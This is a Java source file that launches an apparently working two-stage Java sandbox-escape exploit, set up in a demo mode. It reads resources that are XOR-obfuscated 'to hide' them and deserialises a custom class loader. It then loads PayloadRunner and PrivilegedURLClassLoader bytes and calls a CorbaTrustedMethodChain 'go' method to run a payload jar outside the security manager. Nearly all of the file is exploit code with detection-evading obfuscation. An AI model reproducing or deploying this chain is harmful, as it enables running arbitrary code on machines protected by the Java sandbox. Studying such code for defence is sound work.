twostage/src-exploit/x/StandaloneStarter.java
package x;
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.InputStream;
import java.io.ObjectInputStream;
public class StandaloneStarter {
public static byte[] payloadRunnerClassBytes;
public static byte[] privilegedURLClassLoaderClassBytes;
public static void main(String[] args) throws Exception {
try {
System.setSecurityManager(null);
System.err.println("Please start with JVM parameters: -Djava.security.manager");
System.err.println("Else running this demonstration makes no sense.");
return;
} catch( SecurityException ex ) {
// We expect this
}
EP.docBase = "demomode";
EP.pJar = "payload.jar";
EP.pClass = "payload.DemoPayload";
// Starting exploit
try {
byte[] bytes = new byte[4096];
InputStream in = XAppletW.class.getResourceAsStream("classes.ser");
ByteArrayOutputStream out = new ByteArrayOutputStream();
int bytesRead;
while( (bytesRead = in.read(bytes)) != -1) {
out.write(bytes, 0, bytesRead);
}
in.close();
bytes = out.toByteArray();
for( int i=0; i<bytes.length; i++ ) {
bytes[i] = (byte) (bytes[i] ^ 255); // "Inverse bits encryption": Enough to hide
}
ByteArrayInputStream bin = new ByteArrayInputStream(bytes);
ObjectInputStream oin = new ObjectInputStream(bin);
EC cl = (EC) oin.readObject();
//-------------------
boolean decodeNeeded = true;
in = XAppletW.class.getResourceAsStream("/x/pr");
if( in == null ) {
in = XAppletW.class.getResourceAsStream("/x/PayloadRunner.class");
decodeNeeded = false; // Dev mode
}
bytes = new byte[100000];
bytesRead = in.read(bytes);
if( decodeNeeded ) {
for( int i=0; i<bytes.length; i++ ) {
bytes[i] = (byte) (bytes[i] ^ 255); // Enought to hide
}
}
byte[] payloadRunnerClassBytes = new byte[bytesRead];
System.arraycopy(bytes, 0, payloadRunnerClassBytes, 0, bytesRead);
decodeNeeded = true;
in = XAppletW.class.getResourceAsStream("/x/puc");
if( in == null ) {
in = XAppletW.class.getResourceAsStream("/x/PrivilegedURLClassLoader.class");
decodeNeeded = false; // Dev mode
}
bytes = new byte[100000];
bytesRead = in.read(bytes);
if( decodeNeeded ) {
for( int i=0; i<bytes.length; i++ ) {
bytes[i] = (byte) (bytes[i] ^ 255); // Enought to hide
}
}
byte[] privilegedURLClassLoaderClassBytes = new byte[bytesRead];
System.arraycopy(bytes, 0, privilegedURLClassLoaderClassBytes, 0, bytesRead);
decodeNeeded = true;
in = XAppletW.class.getResourceAsStream("/x/bs");
if( in == null ) {
in = XAppletW.class.getResourceAsStream("/x/bytes.ser");
decodeNeeded = false; // Dev mode
}
bytes = new byte[100000];
bytesRead = in.read(bytes);
if( decodeNeeded ) {
for( int i=0; i<bytes.length; i++ ) {
bytes[i] = (byte) (bytes[i] ^ 255); // Enought to hide
}
}
byte[] serializedBytes = new byte[bytesRead];
System.arraycopy(bytes, 0, serializedBytes, 0, bytesRead);
//-------------------
Class ctmc = cl.getClass("x.CorbaTrustedMethodChain");
ctmc.getField("payloadRunnerClassBytes").set(null, payloadRunnerClassBytes);
ctmc.getField("privilegedURLClassLoaderClassBytes").set(null, privilegedURLClassLoaderClassBytes);
ctmc.getField("serializedBytes").set(null, serializedBytes);
ctmc.getField("docBase").set(null, EP.docBase);
ctmc.getField("pJar").set(null, EP.pJar);
ctmc.getField("pClass").set(null, EP.pClass);
ctmc.getField("pArgs").set(null, EP.pArgs);
ctmc.getField("pBin").set(null, EP.pBin);
ctmc.getMethod("go", new Class[]{}).invoke(null, new Object[]{});
} catch (Exception e) {
e.printStackTrace();
}
}
}